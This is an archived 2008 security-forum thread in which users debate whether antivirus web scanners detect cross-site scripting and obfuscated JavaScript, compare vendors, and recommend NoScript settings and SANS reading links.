Blocking Cross-site scripting (XSS)

Discussion in 'other security issues & news' started by arran, Feb 24, 2008.

Thread Status:
Not open for further replies.
  1. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Really? That "impossible" something has been happening since day one that web scanners were created, actually.
     
  2. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    Please elaborate! This is news to me and I am eager to hear more.
     
  3. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    lucas was basically describing exactly what http scanners do: they parse network traffic, including JS, on the fly.

    Of course, each vendor does this with varying detection rates. Given the vast number of methods to obfuscate javascript code with, it's pretty hard, if not impossible, to build generic decryptors to handle every one of them.

    Lastly, I'd like to know if anyone has concrete evidence that antivirus scanners don't detect javascript containing XSS code. My samples are a bit scarce in this regard, unfortunately.
     
  4. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    So would I!
     
  5. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    That was my point, sorry for not making it clearer :oops:
    I'd guess that parsing and decrypting every bit of JS should cause a big performance penalty, right?
    I'd like to know too. Detecting an injected form in an otherwise clean/trusted site sounds difficult.
     
  6. Trespasser

    Trespasser Registered Member

    Joined:
    Mar 1, 2005
    Posts:
    1,204
    Location:
    Virginia - Appalachian Mtns
    I'd like to see some info that an antivirus does detect javascript containing XSS code.
     
  7. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Web browsers do it effectively, without much penalty, also adding a layer over it does not appear to be that complicated. As every scripts must be interpreted it seems logical that some buffer filtering the java code acting before the interpreter receives it should exist... I believe this is what link scanner Pro does.

    I think that the issue should be more related to what each specific browser allows as per commands to be executed when passed by the interpreter to the engine... That is where it gets complicated I believe. Maybe something that behaves a bit like a HIPS but specific to web browsers would be a nice new innovative technology that may mitigate the risks by allowing the users some control over requests, unlike NoScript that blocks each and every scripts based...
     
    Last edited: Mar 31, 2008
  8. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Nope. Avira and Filseclab (a Chinese vendor), for example, handles this with aplomb. They have a very "unique" method to accomplish this, similar with how they handle packed trojans - if you get my drift.

    Kaspersky is also a good performer against scripts. Again, no noticeable slowdown. So it's difficult for us laypeople who look at it from an outsider's point of view with no idea how to get it done, but apparently it's very doable for the vendors.
     
  9. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I get your point ;) BTW, are you talking about this Filseclab?
    So, we have nothing but wild speculation :( It would be nice if some vendor is willing to share a little more info about the engines they develop.
     
  10. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Just develop your own... simple. Whenever some company offers source code publicly it is... well, either an act of desperation or to be regarded as suspicious... At least this is how I would regard it. Even cooks wont relinquish a personal recipe unless under duress.
     
  11. Cerxes

    Cerxes Registered Member

    Joined:
    Sep 6, 2005
    Posts:
    581
    Location:
    Northern Europe
    ...or they just applying an other economic model for their business.

    /C.
     
  12. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Perhaps... :cautious:
     
  13. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Somethings confuses me a bit about packed trojans, and the "problems" AV's have detecting them...

    I'm assuming you refer to Trojans encapsulated within archived executables or cabinets.

    Is it caused by the compression algorithms or by the encryption algorithm? or is it due to the fact both are equally true ie they are compressed and encrypted?
     
  14. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Yep. They produce an antivirus product as well, and quite a decent one at that when it comes to regional malware.

    The easiest and quickest way to decrypt js is to parse it using the browser rendering engine, while applying selective decryption routines to specially encoded parts (unescape, hex shellcode, ALPHA2 etc). This method is sufficient to unravel the majority of encrypted js code into human-readable text. Some functions, like arguments.callee.toString(), defeat this method, but they're rare and few in between, and I suppose it might not be too hard to develop special decryption routines to handle them.
     
  15. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    So, considering this, webscanner aren't utterly useless (if you can swallow the slowdown) :)
    But, relying on the output of the browser rendering engine may introduce differences in the detection rates when dealing with browser-specific code, right?
     
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Some reading on arguments.callee.toString()

    Arguments.callee.toString() demystified
    http://isc.sans.org/diary.html?storyid=3231

    Other diaries of interest to the topic:

    How to stop javascript from websites infecting clients
    http://isc.sans.org/diary.html?storyid=3733

    XSS Incident Handling
    http://isc.sans.org/diary.html?storyid=3420

    Raising the bar: dynamic JavaScript obfuscation
    http://isc.sans.org/diary.html?storyid=3219

    Deobfuscating VBScript
    http://isc.sans.org/diary.html?storyid=3351

    Browser *does* matter, not only for vulnerabilities - a story on JavaScript deobfuscation
    http://isc.sans.org/diary.html?storyid=1519

    Remember, that most of the XSS exploits are the Reflective type, so that the user has some control
    in deciding whether or not to click on a link that might have code appended to the URL.

    Note that the most sensational exploits were those involving users on Social network sites, where users
    seem to click at will on anything.


    ----
    rich
     
  17. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    This "slowdown" you keep mentioning seems to be vendor-specific, at best. Avira and Kaspersky have no problems with it. I haven't personally trialed AVG 8.0, which is rapidly increasing its detection rate for exploits as well, but nobody seems to be complaining about it so far. Which vendors produce this "slowdown" you keep talking about?

    True, but that's just how I speculated it was done. For all we know the AV vendors might have written their own parsing engine.

    A very formidable encryption to crack indeed for the usual, by-the-book analysts, but easily defeated with a very simple, think-outside-of-the-box method: reference the called argument as a separate variable, then stick that variable into the function. Problem solved.
     
  18. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I feel the slowdown with all webscanners, although I should say that the one in avast! is the fastest.
     
  19. Fly

    Fly Registered Member

    Joined:
    Nov 1, 2007
    Posts:
    2,201
    I'd be the last person to promote McAfee (I 've been waiting for VIPRE, but McAfee Virusscan Plus hasn't caused any serious problems lately), but if you go to the security center, advanced menu, computer and files, configure, you will see a script scanning feature. Someone stated that McAfee does not have a http scanner, but this ability to scan for malicious scripts seems very nice. McAfee actually managed to catch a piece of malicious javascript that tried to installed a trojan. Both were detected in real-time and their installation was prevented. (This was the ONE infection in two or three years).

    I have no idea if it was really cross-site scripting. (The McAfee SiteAdvisor marked the webpage as safe). Scanning for scripts is a major, if not THE major, way McAfee 'protects' your computer. The script scanning feature suggests that it's at least partially heuristic.

    With infection by malicious scripts being one of the major attack vectors, using a script to catch malicious scripts seems actually cool. (I'm very conservative regarding downloading programs, ActiveX etc, and I don't P2P).
    For as far as I know, McAfee runs two scripts on my computer, one being the SiteAdvisor, the other the main (?) real-time protection feature of McAfee.
    (I got that information from the Spy Sweeper)

    I'm not aware of any other 'antivirus' programs that use scripts as a major part of their real-time protection. Does anyone know ? What do you think of that approach ?
     
  20. tlu

    tlu Guest

    Yes. Giorgio is closely monitoring http://sla.ckers.org/forum/list.php?3 which is probably the best source if you're interested in the newest XSS attack types.

    There is (or better: was) an XSS Cheat Sheet by RSnake on http://ha.ckers.org/xssAttacks.xml that is sort of a compilation of the known XSS attack vectors and regarded as, probably, the definite list. However, that domain is offline at the moment - I don't know what happened to it.

    BTW: Giorgio is also running another site called http://hackademix.net/ where he promotes Noscript, of course, but which contains very interesting information about XSS and other topics.
     
  21. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Thanks tlu. Very useful information, as always.
     
  22. tlu

    tlu Guest

    No, not when it comes to XSS. See also the quotes in Firebytes' post #10

    Yes. The same answer as above applies. I'd also suggest to set noscript.injectionCheck in about:config to "3". Giorgio wrote about this setting on this site:

    " Setting injectionCheck to 3 does provide the strongest protection, since it checks also injections in requests from a certain site to itself.
    This would prevent, for instance, reflective XSS attacks launched by clicking a link inside a site you trust (e.g. in a blog comment) and directed to the site itself.
    The downside would be dealing with false positives on sites where you're supposed to enter stuff looking like code in search forms or other input fields, e.g. on a programming-devote forum.

    I believe a value of 2 draws a good usability/security balance most of the time (checking all the requests from a certain site to a different site), and that's why I'm using it as the default, especially because really valuable sites (e.g. your bank) usually don't allow users to post and publish links or any other content.

    On the other hand, if you use one of those promiscuous places called "social web sites" and you want to protect your profile or other data you deem valuable stored on that site from other users of the same community, setting injectionCheck to 3 may be a good idea. "

    No, since XSS is not the only problem. Most security leaks in Firefox (and other browsers) are somehow related to Javascript. Besides, on blacklisted sites you are also protected against leaks in plugins like Java, Flash etc.
     
  23. tlu

    tlu Guest

    This is not correct in regards of XSS - see my previous post.
     
  24. Stijnson

    Stijnson Registered Member

    Joined:
    Nov 7, 2007
    Posts:
    533
    Location:
    Paranoia Heaven
    Sorry to be such a n00b (but I'm learning new things here at Wilders every day), but wouldn't browsing with FF+NS+SandboxIE cover these attacks?
     
  25. tlu

    tlu Guest

    o_O I don't know your surfing habits, of course, but I guess that probably more than 80% of all sites you open every day are the same - like this forum. If you trust them you have to whitelist them just once and Noscript will remember them till eternity. I can't see your problem. Yes - you have to decide for every new site but that's the logic of this approach. And most sites you stumble upon (e.g. via Google) will work (i.e. are at least viewable) without having them whitelisted.
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.